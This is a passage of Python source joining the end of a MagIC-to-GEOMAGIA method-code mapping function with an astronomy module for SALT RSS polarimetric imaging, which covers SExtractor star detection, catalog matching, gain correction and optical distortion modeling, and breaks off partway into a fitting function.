    # end for loop
def method_codes_to_geomagia(magic_method_codes, geomagia_table):
    """
    Looks at the MagIC method code list and returns the correct GEOMAGIA code number depending
    on the method code list and the GEOMAGIA table specified. Returns 0, GEOMAGIA's "Not specified"
    value, if no match. When mutiple codes are matched they are separated with :

    Parameters
    ----------
    magic_method_codes : str
        colon-delimited list of MagIC method codes (substring matching is used)
    geomagia_table : str
        GEOMAGIA table name, case-insensitive (e.g. 'ALTERATION_MONIT_CORR', 'MD_CHECKS')

    Returns
    -------
    str
        the GEOMAGIA code, '0' when nothing matches
    """
    codes = magic_method_codes
    geomagia = geomagia_table.lower()
    geomagia_code = '0'
    if geomagia == 'alteration_monit_corr':
        # BUGFIX: the original used `if "A" or "B" in codes:`, which is always true
        # (the bare string "A" is truthy); each code must be tested individually.
        if ("DA-ALT-V" in codes) or ("LP-PI-ALT-PTRM" in codes) or ("LP-PI-ALT-PMRM" in codes):
            geomagia_code = '1'
        elif "LP-PI-ALT-SUSC" in codes:
            geomagia_code = '2'
        elif ("DA-ALT-RS" in codes) or ("LP-PI-ALT-AFARM" in codes):
            geomagia_code = '3'
        elif "LP-PI-ALT-WALTON" in codes:
            geomagia_code = '4'
        elif "LP-PI-ALT-TANGUY" in codes:
            geomagia_code = '5'
        elif "LP-PI-ALT-FABIAN" in codes:
            geomagia_code = '7'
        elif "DA-ALT" in codes:
            # BUGFIX: generic DA-ALT moved after FABIAN so the specific code wins,
            # matching the original's own "at end to fill generic" comment.
            geomagia_code = '6'
    if geomagia == 'md_checks':
        if ("LT-PTRM-MD" in codes) or ("LT-PMRM-MD" in codes):
            geomagia_code = '1:'
        if ("LP-PI-BT-LT" in codes) or ("LT-LT-Z" in codes):
            if "0" in geomagia_code:
                # NOTE(review): '23' reproduced from the original -- confirm intended code
                geomagia_code = "23:"
            else:
                geomagia_code += '2:'
        # BUGFIX: the original stripped the last character unconditionally, turning
        # the no-match value '0' into an empty string; strip only a trailing ':'.
        geomagia_code = geomagia_code.rstrip(':')
    if geomagia == 'anisotropy_correction':
        if "DA-AC-AMS" in codes:
            geomagia_code = '1'
        elif "DA-AC-AARM" in codes:
            geomagia_code = '2'
        elif "DA-AC-ATRM" in codes:
            geomagia_code = '3'
        elif "LT-NRM-PAR" in codes:
            geomagia_code = '4'
        elif "DA-AC-AIRM" in codes:
            geomagia_code = '6'
        elif "DA-AC" in codes:   # at end to fill generic if others don't exist
            geomagia_code = '5'
    if geomagia == 'cooling_rate':
        if "DA-CR" in codes:   # all current CR codes but CR-EG are a 1 but may change in the future
            geomagia_code = '1'
        if "DA-CR-EG" in codes:
            geomagia_code = '2'
    if geomagia == 'dm_methods':
        if "LP-DIR-AF" in codes:
            geomagia_code = '1'
        elif "LT-AF-D" in codes:
            geomagia_code = '1'
        elif "LT-AF-G" in codes:
            geomagia_code = '1'
        elif "LT-AF-Z" in codes:
            geomagia_code = '1'
        elif "LP-DIR-T" in codes:
            geomagia_code = '2'
        elif "LT-AF-Z" in codes:
            # NOTE(review): unreachable -- duplicates the LT-AF-Z branch above;
            # possibly meant "LT-T-Z" (thermal). Kept as in the original -- confirm.
            geomagia_code = '2'
        elif "LP-DIR-M" in codes:
            geomagia_code = '5'
        elif "LT-M-Z" in codes:
            geomagia_code = '5'
    if geomagia == 'dm_analysis':
        if "DE-BFL" in codes:
            geomagia_code = '1'
        elif "DE-BLANKET" in codes:
            geomagia_code = '2'
        elif "DE-FM" in codes:
            geomagia_code = '3'
        elif "DE-NRM" in codes:
            geomagia_code = '6'
    if geomagia == 'specimen_type_id':
        if "SC-TYPE-CYC" in codes:
            geomagia_code = '1'
        elif "SC-TYPE-CUBE" in codes:
            geomagia_code = '2'
        elif "SC-TYPE-MINI" in codes:
            geomagia_code = '3'
        elif "SC-TYPE-SC" in codes:
            geomagia_code = '4'
        elif "SC-TYPE-UC" in codes:
            geomagia_code = '5'
        elif "SC-TYPE-LARGE" in codes:
            geomagia_code = '6'
    return geomagia_code
# Run main() only when executed as a command-line script (not on import)
if __name__ == "__main__":
    main()
|
|
# mapping tools, including:
# sextract(fits,sigma=5.,deblend=.005,minpix=10,fwhmlo=0.6,fwhmhi=1.5,cull=False,logfile='salt.log',debug=False)
# catid(yxcat_dt, yxcand_ds, offsettol=10., errtol=4.,debug=False,logfile='salt.log',name='')
# ccdcenter(image_rc)
# gaincor(hdu)
# YXcalc(ra_t,dec_t,RAd,DECd,PAd,fps)
# RSScoldistort(yx_ds,wav_s,coltem,distTab=[],debug=False)
# RSScamdistort(alfyx_ds,wav_s,camtem,distTab=[],debug=False)
# RSSpolsplit(alfyx_ds,wav_s,mag=.99779,distTab=[],paramTab=[],debug=False)
# RSScolpolcam(YX_ds, wav_s, coltem, camtem, yxOEoff_d=np.zeros(2))
# RSSpolgeom(hdul,wavl,yxOEoff_d=np.zeros(2))
# impolguide(YX_dt,yx_dpt,yxOEoff_d,wavl,coltem,camtem,fitOEoff=True,debug=False,name='')
# Tableinterp(Tab,interpkey,interp_x)
# rotate2d(yx_ds, rot, center=np.zeros(2))
# boxsmooth1d(ar_x,ok_x,xbox,blklim)
# blksmooth2d(ar_rc,ok_rc,rblk,cblk,blklim,mode="mean",debug=False)
# fence(arr)
# printstdlog(string,logfile)
import os, sys, glob, copy, shutil, inspect
import numpy as np
from scipy import linalg as la
from specpolutils import rssdtralign, datedfile
from scipy.interpolate import interp1d, griddata
from astropy.io import fits as pyfits
from astropy.io import ascii
import astropy.table as ta
datadir = os.path.dirname(__file__) + '/data/'
# ---------------------------------------------------------------------------------
def sextract(fits,sigma=5.,deblend=.005,minpix=10,fwhmlo=0.6,fwhmhi=1.5,cull=False,logfile='salt.log',debug=False):
    # run sextractor to find objects
    # sigma=DETECT_THRESH is 3 in qred.sex. 5 is more reasonable default
    # Version 3, returns catalog as a astropy Table with fields named as in SeXtract
    # NOTE(review): shells out to the external SExtractor binary "sex"; it must be on the PATH.
    hdulist_image = pyfits.open(fits)
    shape_d = np.asarray(hdulist_image["SCI"].data.shape)
    rcbin_d = np.array(hdulist_image[0].header["CCDSUM"].split(" ")).astype(int)
    image_rc = np.copy(hdulist_image["SCI"].data)
    pix_scale=0.125                       # arcsec per unbinned pixel -- presumably RSS scale, TODO confirm
    r_ap=2.0/(pix_scale*rcbin_d.min())    # 2 arcsec photometry aperture in binned pixels
    sat=0.99*image_rc.max()               # treat pixels just below the image max as saturated
    # output columns requested from SExtractor, written one per line to the .param file
    sexparamlist = ["X_IMAGE","Y_IMAGE","MAG_APER(1)","MAGERR_APER(1)","FLUX_ISO","FLUXERR_ISO", \
        "FLUX_MAX","THETA_IMAGE","ELLIPTICITY","FWHM_IMAGE","FLAGS","CLASS_STAR","EXT_NUMBER"]
    np.savetxt("sxtr_findstars.param",sexparamlist,fmt="%s")
    cmd= ('sex %s -c '+datadir+'qred.sex -PARAMETERS_NAME %s -CATALOG_NAME %s -DETECT_THRESH %f '+ \
        '-PHOT_APERTURES %f -SATUR_LEVEL %f -DEBLEND_MINCONT %f -DETECT_MINAREA %i') \
        % (fits, "sxtr_findstars.param", "out.txt", sigma, r_ap, sat, deblend, minpix)
    if debug:
        # keep SExtractor's console output for inspection
        os.system(cmd+" &> "+fits.replace(".fits","_debug.txt"))
    else:
        os.system(cmd+" &> /dev/null")
    if (not os.path.exists("out.txt")):
        printstdlog( "call to SeXtractor failed",logfile)
        exit()
    sextab = ascii.read("out.txt",names=sexparamlist)
    # only use ext=1 extension in MEF
    sextab = sextab[:][sextab['EXT_NUMBER']==1]
    sextab.remove_column('EXT_NUMBER')
    if cull:
        rc_ds = np.array([sextab["Y_IMAGE"],sextab["X_IMAGE"]])
        fl_s = sextab["FLUX_ISO"]
        fw_s = sextab["FWHM_IMAGE"]
        stars = fl_s.shape[0]
        if debug: printstdlog( 'SeXtract total: '+str(stars), logfile)
        # combine well-detected stars closer than 1.5 bin
        ok_s = np.ones(stars,dtype=bool)
        minsep = 1.5
        # pairwise distance matrix; comb_ss marks pairs closer than minsep (incl. self)
        dist_ss = np.sqrt(((rc_ds[:,:,None] - rc_ds[:,None,:])**2).sum(axis=0))
        comb_ss = (dist_ss < minsep).astype(int)
        # flux-weighted mean position of each close group
        rc_ds = (comb_ss[None,:,:]*fl_s[None,None,:]*rc_ds[:,None,:]).sum(axis=2)
        fl_s = (comb_ss*fl_s[None,:]).sum(axis=1)
        rc_ds /= fl_s
        # combined FWHM: max member FWHM widened by the group's mean separation
        fw_s = np.sqrt(((comb_ss*fw_s[None,:]).max(axis=1))**2 + ((comb_ss*dist_ss).mean(axis=1))**2)
        for s in range(stars):
            if ok_s[s]:
                # keep s, drop the other members of its group
                flagoff_s = ((np.eye(stars)[s] == 0) & (comb_ss[s] > 0))
                ok_s[flagoff_s] = False
        # get rid of non-stars based on fwhm compared to median
        fwhmmed = np.median(fw_s[ok_s])
        ok_s &= ((fw_s > fwhmlo*fwhmmed) & (fw_s < fwhmhi*fwhmmed))
        Stars = ok_s.sum()
        s_S = np.where(ok_s)[0]
        sextabcull = sextab[s_S]
        if debug:
            printstdlog( 'After duplicate and FWHM cull: '+str(Stars),logfile)
            np.savetxt(fits.replace(".fits","_sxtr_culled.txt"),sextabcull, \
                fmt=6*"%12.4f "+4*"%10.3f "+"%4i %6.2f")
    if debug:
        # in debug mode keep the temp files and dump the full catalog
        np.savetxt(fits.replace(".fits","_sxtr.txt"),sextab, \
            fmt=6*"%12.4f "+4*"%10.3f "+"%4i %6.2f")
    else:
        os.remove("sxtr_findstars.param")
        os.remove("out.txt")
    if cull: return sextabcull, sextab
    else: return sextab
# ------------------------------------
def catid(yxcat_dt, yxcand_ds, offsettol=10., errtol=4.,debug=False,logfile='salt.log',name=''):
    """identify candidate positions in a catalog prediction, using 2D histogram of offset vectors

    Parameters:
    yxcat_dt: 2d numarray input coordinates for catalog
        _d: 0,1 for y,x
        _t: "target" index of catalog inputs
    yxcand_ds: 2d numarray input coordinates for catalog
        _d: 0,1 for y,x
        _s: "star" index of candidate inputs
    offsettol: float mm
        use to set size of offset histogram
    errtol: float mm
        use to set size of histogram bins

    Returns: t_i,s_i
    arrays of catalog and found indices for id'd pairs _i
    """
    # find similar offset vectors.
    # form 2d histogram of offset, over +/- 2*offsettol in errtol bins
    targets = yxcat_dt.shape[1]
    candidates = yxcand_ds.shape[1]
    # all candidate-minus-target offset vectors
    offyx_dts = (yxcand_ds[:,None,:] - yxcat_dt[:,:,None])
    offhist_yx,yedge,xedge = np.histogram2d(offyx_dts[0].flatten(),offyx_dts[1].flatten(), \
        bins=np.arange(-2*offsettol,2*offsettol+errtol,errtol))
    # ids in 3x3 histogram block surrounding histogram max
    j,i = np.array(np.where(offhist_yx==np.max(offhist_yx))).T[0]
    ok_ts = ((offyx_dts[0] > yedge[max(0,j-1)]) & (offyx_dts[0] < yedge[min(j+2,yedge.shape[0]-1)])) & \
        ((offyx_dts[1] > xedge[max(0,i-1)]) & (offyx_dts[1] < xedge[min(i+2,xedge.shape[0]-1)]))
    # median offset of the pairs in that block, and radial residual of every pair from it
    offyx_d = np.array([np.median(offyx_dts[0][ok_ts]),np.median(offyx_dts[1][ok_ts])])
    roff_ts = np.sqrt(((offyx_dts - offyx_d[:,None,None])**2).sum(axis=0))
    t_i = np.where(ok_ts)[0]
    s_i = np.where(ok_ts)[1]
    roff_i = roff_ts[t_i,s_i]
    ids = ok_ts.sum()
    uniquetargetids = np.unique(t_i).shape[0]
    uniquecandids = np.unique(s_i).shape[0]
    if debug:
        printstdlog ((("Catalog entries %3i, Candidates %3i") % (targets,candidates)),logfile)
        printstdlog (((" Ids %3i, unique targets %3i, unique candidates %3i") % \
            (ids,uniquetargetids,uniquecandids)),logfile)
        printstdlog (((" yx offset (mm): %8.3f %8.3f") % tuple(offyx_d)),logfile)
        np.savetxt(name+"catid1.txt", np.vstack((t_i,s_i,yxcat_dt[:,t_i],yxcand_ds[:,s_i], \
            offyx_dts[:,t_i,s_i])).T,fmt="%4i %4i "+6*"%8.3f ")
        np.savetxt(name+"idhist.txt", offhist_yx, fmt="%3i")
        sbest_t = np.argmin(roff_ts,axis=1)
        np.savetxt(name+"sbest_t.txt",np.vstack((np.arange(targets),sbest_t, \
            roff_ts[range(targets),sbest_t], yxcat_dt,yxcand_ds[:,sbest_t])).T, \
            fmt="%4i %4i %7.3f "+4*"%8.3f ")
    # get best id in case of multiple id's of same target
    roffmin_t = roff_ts.min(axis=1)
    okt_i = np.in1d(roff_i,roffmin_t[t_i])
    ids = okt_i.sum()
    uniquecandids = np.unique(s_i[okt_i]).shape[0]
    if ((ids < ok_ts.sum()) and debug):
        printstdlog (((" Ids %3i, unique candidates %3i") % (ids,uniquecandids)),logfile)
        np.savetxt(name+"catid2.txt", np.vstack((t_i[okt_i],s_i[okt_i],yxcat_dt[:,t_i[okt_i]], \
            yxcand_ds[:,s_i[okt_i]],offyx_dts[:,t_i[okt_i],s_i[okt_i]])).T,fmt="%4i %4i "+6*"%8.3f ")
    # get best id in case of multiple id's of same candidate
    roffmin_s = roff_ts.min(axis=0)
    okts_i = np.in1d(roff_i,roffmin_s[s_i[okt_i]])
    ids = okts_i.sum()
    if ((ids < okt_i.sum()) and debug):
        printstdlog (((" Ids %3i") % ids),logfile)
        np.savetxt(name+"catid3.txt", np.vstack((t_i[okts_i],s_i[okts_i],yxcat_dt[:,t_i[okts_i]], \
            yxcand_ds[:,s_i[okts_i]],offyx_dts[:,t_i[okts_i],s_i[okts_i]])).T,fmt="%4i %4i "+6*"%8.3f ")
    return t_i[okts_i],s_i[okts_i]
# ------------------------------------
def ccdcenter(image_rc):
    """find gaps and center of ccd image

    The three CCD segments are located by scanning the column means for runs of
    live columns (mean neither 0 nor -1); the two inter-chip gaps bound them.

    Parameters:
    image_rc: 2d image
    Returns: rccenter_d (int r,c of center), cgap_c (int column of 4 gap edges)
    """
    colmean_c = image_rc.mean(axis=0)
    nrows, ncols = image_rc.shape
    live_c = (colmean_c != 0) & (colmean_c != -1)   # columns with real data
    edge_id = np.zeros((3, 2), dtype=int)
    start = 0
    for seg in (0, 1, 2):
        # first live column at/after start, then last live column of that run
        left = np.argmax(live_c[start:]) + start
        right = np.argmax(~live_c[left:]) + left - 1
        if right == left - 1:       # run extends to the image edge
            right = ncols - 1
        edge_id[seg] = [left, right]
        start = right + 1
    # center row, and center column taken as the middle of the central segment
    center_d = np.array([nrows / 2, edge_id[1].mean()])
    return center_d, edge_id.flatten()[1:5]
# ------------------------------------
def gaincor(hdul):
    """ get gain correction data for an image

    Parameters:
    hdul: hduList for image

    Returns: np 1D array gaincor_c. Divide column c in image by gaincor_c
    """
    # assumes data final 2 dimensions are row,col
    rows,cols = hdul['SCI'].data.shape[-2:]
    cbin, rbin = [int(x) for x in hdul[0].header['CCDSUM'].split(" ")]
    dateobs = hdul[0].header['DATE-OBS'].replace('-','')
    utchour = int(hdul[0].header['UTC-OBS'].split(':')[0])
    # before 10h UT counts as the previous observing night's date
    mjdateobs = str(int(dateobs) - int(utchour < 10))
    gain = hdul[0].header['GAINSET']
    speed = hdul[0].header['ROSPEED']
    rccenter_d, cgap_c = ccdcenter(hdul['SCI'].data.flat[:rows*cols].reshape(rows,cols))
    # amplifier column boundaries: 2 amps per CCD, 3 CCDs, 1024 unbinned cols per amp
    c_a = np.array([0, cgap_c[0]-1024/cbin+1, cgap_c[[0,1]].mean(), \
        cgap_c[1]+1024/cbin, cgap_c[[2,3]].mean(), cgap_c[3]+1024/cbin, cols])
    gaincor_c = np.ones(cols)
    # most recent gain-correction table in effect on the observation date
    GainCorrectionFile = datedfile(datadir+"RSS_Gain_Correction_yyyymmdd_vnn.txt",mjdateobs)
    if (len(GainCorrectionFile)==0): return gaincor_c   # no table: unity correction
    # NOTE(review): dtype='string' is Python-2-era numpy; modern numpy wants dtype=str -- confirm runtime
    mode_ld = np.loadtxt(GainCorrectionFile, dtype='string', usecols=(0,1))
    # row matching this image's gain setting and readout speed
    lmode = np.where((mode_ld[:,0]==gain) & (mode_ld[:,1] == speed))[0][0]
    gaincor_a = np.loadtxt(GainCorrectionFile, usecols=range(2,8), unpack=True).T[lmode]
    for a in range(6):
        if (gaincor_a[a] == 1.): continue   # amp already at unity gain
        isa_c = ((np.arange(cols) >= c_a[a]) & (np.arange(cols) < c_a[a+1]))
        gaincor_c[isa_c] = gaincor_a[a]
    return gaincor_c
# ------------------------------------
def YXcalc(ra_t,dec_t,RAd,DECd,PAd,fps):
    """compute YX SALT fov positions (mm from LOS)

    Small-angle tangent-plane projection of target RA/Dec about the line of
    sight, rotated by the position angle and scaled to focal-plane mm
    (3.6 = 3600 arcsec/deg / 1000 micron/mm).

    Parameters:
    ra_t: 1d numarray, RA (degrees) for targets _t
    dec_t: 1d numarray, Dec (degrees) for targets _t
    RAd, DECd, PAd: RA, Dec, PA of LOS (degrees)
    fps: SALT focal plane scale (micron/arcsec)
    Returns: YX_dt (mm)
    """
    pa_rad = np.radians(PAd)
    sinpa = np.sin(pa_rad)
    cospa = np.cos(pa_rad)
    # RA offsets are foreshortened by cos(dec)
    cosdec_t = np.cos(np.radians(dec_t))
    dra_t = ra_t - RAd
    ddec_t = dec_t - DECd
    Y_t = 3.6*fps*(cosdec_t*dra_t*sinpa + ddec_t*cospa)
    X_t = 3.6*fps*(-cosdec_t*dra_t*cospa + ddec_t*sinpa)
    return np.array([Y_t, X_t])
# ------------------------------------
def RSScoldistort(YX_ds,wav_s,coltem,distTab=[],debug=False):
    """apply collimator distortion to array of Y,X coordinates

    Parameters:
    YX_ds: 2d numarray input coordinates (mm, SALT focal plane)
        _d: 0,1 for Y,X
        _s: index of inputs
    wav_s: 1d numarray (or float, if all the same) wavelength (Ang)
    coltem: collimator temperature (C), for focal-length correction
    disttab: astropy Table of distortion model parameters, vs wavelength

    Returns: alfyx_ds (degrees) angles in collimated space
    """
    stars = YX_ds.shape[1]
    if np.isscalar(wav_s): wav_s = np.repeat(wav_s,stars)   # broadcast single wavelength
    imgoptfile = datadir+'RSSimgopt.txt'
    if len(distTab)==0:
        distTab = ascii.read(imgoptfile,data_start=1, \
            names=['Wavel','Fcoll','Acoll','Bcoll','ydcoll','xdcoll','Fcam','acam','alfydcam','alfxdcam'])
    # first line of the optics file holds the focal-length temperature coefficients
    dFcoldt,dFcamdt = ascii.read(imgoptfile,data_end=1)[0]
    # model parameters interpolated to each input wavelength
    sdistTab = Tableinterp(distTab,'Wavel',wav_s)
    Fcam,Fcoll = Tableinterp(distTab,'Wavel',5500.)['Fcam','Fcoll'][0]
    # distortion center, scaled from camera to collimator space
    YXdcoll_ds = np.array([sdistTab['ydcoll'],sdistTab['xdcoll']])* Fcoll/Fcam
    # correct for collimator distortion
    Rd_s = np.sqrt(((YX_ds - YXdcoll_ds)**2).sum(axis=0))/50.   # radius from center, in 50 mm units
    dist_s = (1. + sdistTab['Acoll']*Rd_s**2 + sdistTab['Bcoll']*Rd_s**4)
    YXd_ds = YXdcoll_ds + dist_s*(YX_ds - YXdcoll_ds)
    # mm -> degrees using the temperature-corrected collimator focal length
    alfyx_ds = np.degrees(YXd_ds/(sdistTab['Fcoll'] + dFcoldt*(coltem - 7.5)))
    if debug: np.savetxt("coldist.txt",np.vstack((wav_s,YX_ds,dist_s,YXd_ds,alfyx_ds)).T, \
        fmt=3*"%7.2f "+"%10.4f "+2*"%7.2f "+2*"%9.4f ")
    return alfyx_ds
# ------------------------------------
def RSScamdistort(alfyx_ds,wav_s,camtem,distTab=[],debug=False):
    """apply camera distortion to array of y,x ray angles

    Parameters:
    alfyx_ds: 2d numarray input coordinates (deg)
        _d: 0,1 for y,x
        _s: index of inputs
    wav_s: 1d numarray (or float, if all the same) wavelength (Ang)
    camtem: camera temperature (C), for focal-length correction
    disttab: astropy Table of distortion model parameters, vs wavelength

    Returns: yx_ds (mm) at the detector
    """
    stars = alfyx_ds.shape[1]
    if np.isscalar(wav_s): wav_s = np.repeat(wav_s,stars)   # broadcast single wavelength
    imgoptfile = datadir+'RSSimgopt.txt'
    if len(distTab)==0:
        distTab = ascii.read(imgoptfile,data_start=1, \
            names=['Wavel','Fcoll','Acoll','Bcoll','ydcoll','xdcoll','Fcam','acam','alfydcam','alfxdcam'])
    # first line of the optics file holds the focal-length temperature coefficients
    dFcoldt,dFcamdt = ascii.read(imgoptfile,data_end=1)[0]
    # model parameters interpolated to each input wavelength
    sdistTab = Tableinterp(distTab,'Wavel',wav_s)
    alfyxdcam_ds = np.array([sdistTab['alfydcam'],sdistTab['alfxdcam']])
    # correct for camera distortion
    alfrd_s = np.sqrt(((alfyx_ds - alfyxdcam_ds)**2).sum(axis=0))/5.   # radius from center, in 5 deg units
    dist_s = (1. + sdistTab['acam']*alfrd_s**2)
    alfyxd_ds = alfyxdcam_ds + dist_s*(alfyx_ds - alfyxdcam_ds)
    # degrees -> mm using the temperature-corrected camera focal length
    yx_ds = (sdistTab['Fcam'] + dFcamdt*(camtem - 7.5))*np.radians(alfyxd_ds)
    if debug: np.savetxt("camdist.txt",np.vstack((wav_s,alfyx_ds,dist_s,alfyxd_ds,yx_ds)).T, \
        fmt="%7.2f "+5*"%10.4f "+2*"%7.2f ")
    return yx_ds
# ------------------------------------
def RSSpolsplit(alfyx_ds,wav_s,mag=.99779,distTab=[],paramTab=[],debug=False):
    """apply wollaston prism distortion and splitting for beam OE to array of y,x angles

    Parameters:
    alfyx_ds: 2d numarray input angles (deg), relative to optical axis
        _d: 0,1 for y,x
        _s: index of input targets
    wav_s: float or 1d numarray float
        wavelength (Ang) for point s. If not an array, use for all points
    mag: float, prism magnification applied before the distortion polynomial
    disttab: astropy Table of distortion model parameters for this beam, vs wavelength
    paramTab: astropy Table; beamsplitter rotation/offsets plus E/O parameter ratios (EO* columns)

    Returns: w-distorted and deviated alfyx_dps, (_p = 0,1 for O,E), relative to optical axis
    """
    stars = alfyx_ds.shape[1]
    if np.isscalar(wav_s): wav_s = np.repeat(wav_s,stars)   # broadcast single wavelength
    poldistfile = datadir+'RSSpoldist.txt'
    if len(paramTab)==0:
        # line 1: beamsplitter rotation and offsets; line 2: E/O parameter ratios
        paramTab = ascii.read(poldistfile, data_end=1, names=['bsrot','yoff','xoff'])
        paramTab = ta.hstack([paramTab,ascii.read(poldistfile, data_start=1, data_end=2, \
            names=['EOy_0','EOy_Y','EOy_YY','EOy_XX','EOx_0','EOx_X','EOx_XY','EOx_XXX'])])
    if len(distTab)==0:
        # remaining lines: O-beam distortion polynomial coefficients vs wavelength
        distTab = ascii.read(poldistfile, data_start=2, \
            names = ['Wavel','y_0','y_Y','y_YY','y_XX','x_0','x_X','x_XY','x_XXX'])
    sdistTab = Tableinterp(distTab,'Wavel',wav_s)
    alfyxout_dps = np.zeros((2,2,stars))
    bsrot, yoff, xoff = paramTab['bsrot','yoff','xoff'][0]
    for p in (0,1):
        # rotate about alf=0,0 into prism ref, apply distortion, rotate back out
        alfyxin_ds = mag*rotate2d(alfyx_ds,-bsrot)
        alfyout_s = yoff + sdistTab['y_0'] + sdistTab['y_Y']*alfyxin_ds[0] + \
            0.001*sdistTab['y_YY']*alfyxin_ds[0]**2 + 0.001*sdistTab['y_XX']*alfyxin_ds[1]**2
        alfxout_s = xoff + sdistTab['x_0'] + sdistTab['x_X']*alfyxin_ds[1] + \
            0.001*sdistTab['x_XY']*alfyxin_ds[1]*alfyxin_ds[0] + 0.001*sdistTab['x_XXX']*alfyxin_ds[1]**3
        alfyxout_dps[:,p] = rotate2d(np.array([alfyout_s,alfxout_s]),bsrot)
        # second pass is E, name[2:] strips off the 'EO'
        # (scales the O coefficients in place by the E/O ratios before the p=1 pass)
        for name in paramTab.colnames[3:]: sdistTab[name[2:]] *= paramTab[name]
    return alfyxout_dps
# ---------------------------------------------------------------------------------
def RSScolpolcam(YX_ds, wav_s, coltem, camtem, yxOEoff_d=np.zeros(2)):
    """Complete RSS distortion for polarimetric data.

    Chains collimator distortion, Wollaston O/E split, and camera distortion,
    then applies an optional y,x O-E beam offset (half to each beam, opposite
    signs). Returns detector positions yx_dps (mm), _p = 0,1 for O,E.
    """
    collang_ds = RSScoldistort(YX_ds, wav_s, coltem)
    splitang_dps = RSSpolsplit(collang_ds, wav_s)
    # the camera sees both beams, so the wavelength list is doubled
    if np.isscalar(wav_s):
        wavboth_S = wav_s
    else:
        wavboth_S = np.tile(wav_s, 2)
    yx_dps = RSScamdistort(splitang_dps.reshape((2, -1)), wavboth_S, camtem).reshape((2, 2, -1))
    # shift O and E apart by the supplied OE offset, half each way
    yx_dps += (np.array([[-.5, .5], [-.5, .5]])*yxOEoff_d[:, None])[:, :, None]
    return yx_dps
# ------------------------------------
def RSSpolgeom(hdul,wavl,yxOEoff_d=np.zeros(2)):
    """Return imaging polarimetric layout

    Parameters
    ----------
    hdul: HDU list for relavant image
    wavl: float, wavelength (Ang)
    yxOEoff_d: 1D float numpy array, optional y,x offset to RSScolpolcam nominal E-O

    Returns
    ----------
    yx0_dp: 2D float numpy array, [[y0_O,x0_O],[y0_E,x0_E]].
        mm position of O,E optic axes at this wavelength relative to imaging optic axis
    rshift: int, row of OE FOV split point - imaging CCD center row (5000 Ang)
    yxp0_dp: 2D float numpy array,
        mm position of center of split O,E images relative to O,E optic axes at this wavelength
    isfov_rc: 2D boolean numpy array, (full image) true inside FOV for O and E
    """
    data_rc = hdul[1].data
    rows, cols = data_rc.shape[-2:]
    if len(data_rc.shape)>2:   # allow for pol split data
        rows = 2*rows
        data_rc = data_rc[0]
    cbin, rbin = [int(x) for x in hdul[0].header['CCDSUM'].split(" ")]
    rcbin_d = np.array([rbin,cbin])
    rccenter_d, cgapedge_c = ccdcenter(data_rc)
    camtem = hdul[0].header['CAMTEM']
    coltem = hdul[0].header['COLTEM']
    dateobs = hdul[0].header['DATE-OBS'].replace('-','')
    trkrho = hdul[0].header['TRKRHO']
    pixmm = 0.015   # unbinned pixel size, mm
    ur0,uc0,saltfps = rssdtralign(dateobs,trkrho)   # ur, uc =unbinned pixels, saltfps =micr/arcsec
    yx0_d = -0.015*np.array([ur0,uc0])   # mm position of center in imaging from optical axis
    dyx_dp = np.array([[-.5,.5],[-.5,.5]])*yxOEoff_d[:,None]   # half the OE offset to each beam
    dy = 2.01   # pol fov height in arcmin
    dr = 3.97   # pol fov radius in arcmin
    xcnr = np.sqrt((dr**2-dy**2))
    # 9 fiducial FOV points (corners, edge midpoints, center); point 4 is the center
    YXfov_dt = np.array([[-dy,-dy,-dy, 0.,0.,0., dy,dy,dy], \
        [-xcnr,0.,xcnr,-dr,0.,dr,-xcnr,0.,xcnr]])*60.*saltfps/1000.
    yxfov_dpt = RSScolpolcam(YXfov_dt,wavl,coltem,camtem) + dyx_dp[:,:,None]
    yx0_dp = yxfov_dpt[:,:,4]
    # split point computed at fixed 5000 Ang so it is the same for the whole observation
    yxfovmean_dpt = RSScolpolcam(YXfov_dt,5000.,coltem,camtem) + dyx_dp[:,:,None]
    yxsep_d = 0.5*(yxfovmean_dpt[:,0,7] + yxfovmean_dpt[:,1,1])   # beam fov separation point
    rshift = int(np.trunc((yxsep_d-yx0_d)[0]/(rcbin_d[0]*pixmm)))   # split row offset, same whole obs
    yxp0_dp = yx0_d[:,None] - (yx0_dp + \
        rcbin_d[0]*pixmm*np.array([[-rshift+rows/4,-rshift-rows/4],[0.,0.]]))
    # optic-axis positions in (binned) row,col pixels
    rc0_dp = (yx0_dp-yx0_d[:,None])/(rcbin_d[:,None]*pixmm) + rccenter_d[:,None]
    # FOV extents in pixels: circular radius plus curved upper/lower boundaries
    cfovrad_p = (yxfov_dpt[1,:,5] - yx0_dp[1])/(rcbin_d[1]*pixmm)
    rfovup0_p = (yxfov_dpt[0,:,7] - yx0_dp[0])/(rcbin_d[0]*pixmm)
    rfovdn0_p = (yx0_dp[0] - yxfov_dpt[0,:,1])/(rcbin_d[0]*pixmm)
    rfovupcv_p = (yxfov_dpt[0,:,8] - yxfov_dpt[0,:,7])/(rcbin_d[0]*pixmm)
    rfovdncv_p = (yxfov_dpt[0,:,1] - yxfov_dpt[0,:,2])/(rcbin_d[0]*pixmm)
    ccnr = yxfov_dpt[1,0,8]/(rcbin_d[1]*pixmm)
    dr_pr = np.arange(rows)[None,:] - rc0_dp[0,:][:,None]
    dc_pc = np.arange(cols)[None,:] - rc0_dp[1,:][:,None]
    isfov_rc = np.zeros((rows,cols),dtype=bool)
    for p in (0,1):
        isfov_rc |= ((np.sqrt(dr_pr[p,:,None]**2 + dc_pc[p,None,:]**2) < cfovrad_p[p,None,None]) & \
            (dr_pr[p,:,None] < (rfovup0_p[p,None,None] + rfovupcv_p[p,None,None]*(dc_pc[p,None,:]/ccnr)**2)) & \
            (dr_pr[p,:,None] > -(rfovdn0_p[p,None,None] + rfovdncv_p[p,None,None]*(dc_pc[p,None,:]/ccnr)**2)))
    # BUGFIX: range(...)+range(...) only works on Python 2 (py3 ranges do not
    # support +); build explicit lists so this runs on both Python 2 and 3.
    gapcolList = list(range(cgapedge_c[0],cgapedge_c[1])) + list(range(cgapedge_c[2],cgapedge_c[3]))
    isfov_rc[:,gapcolList] = False   # mask out the inter-chip gap columns
    return yx0_dp, rshift, yxp0_dp, isfov_rc
# ----------------------------------------------
def impolguide(YX_dt,yx_dpt,yxOEoff_d,wavl,coltem,camtem,fitOEoff=True,debug=False,name=''):
# Least squares fit of dY,dX,drot and dyOEoff,dxOEoff of star offset from predicted target position
    # Suffix convention (as elsewhere in this file):
    #   _d = coordinate dimension (0,1 = y,x on detector, Y,X in the field)
    #   _p = polarimetric beam (0,1 = O,E), _t = target,
    #   _C = fit coefficient, _S = stacked equation row (all y's, then all x's).
    # Inputs: YX_dt catalog field positions; yx_dpt measured detector positions;
    #   yxOEoff_d current O/E beam offset; wavl, coltem, camtem are passed through
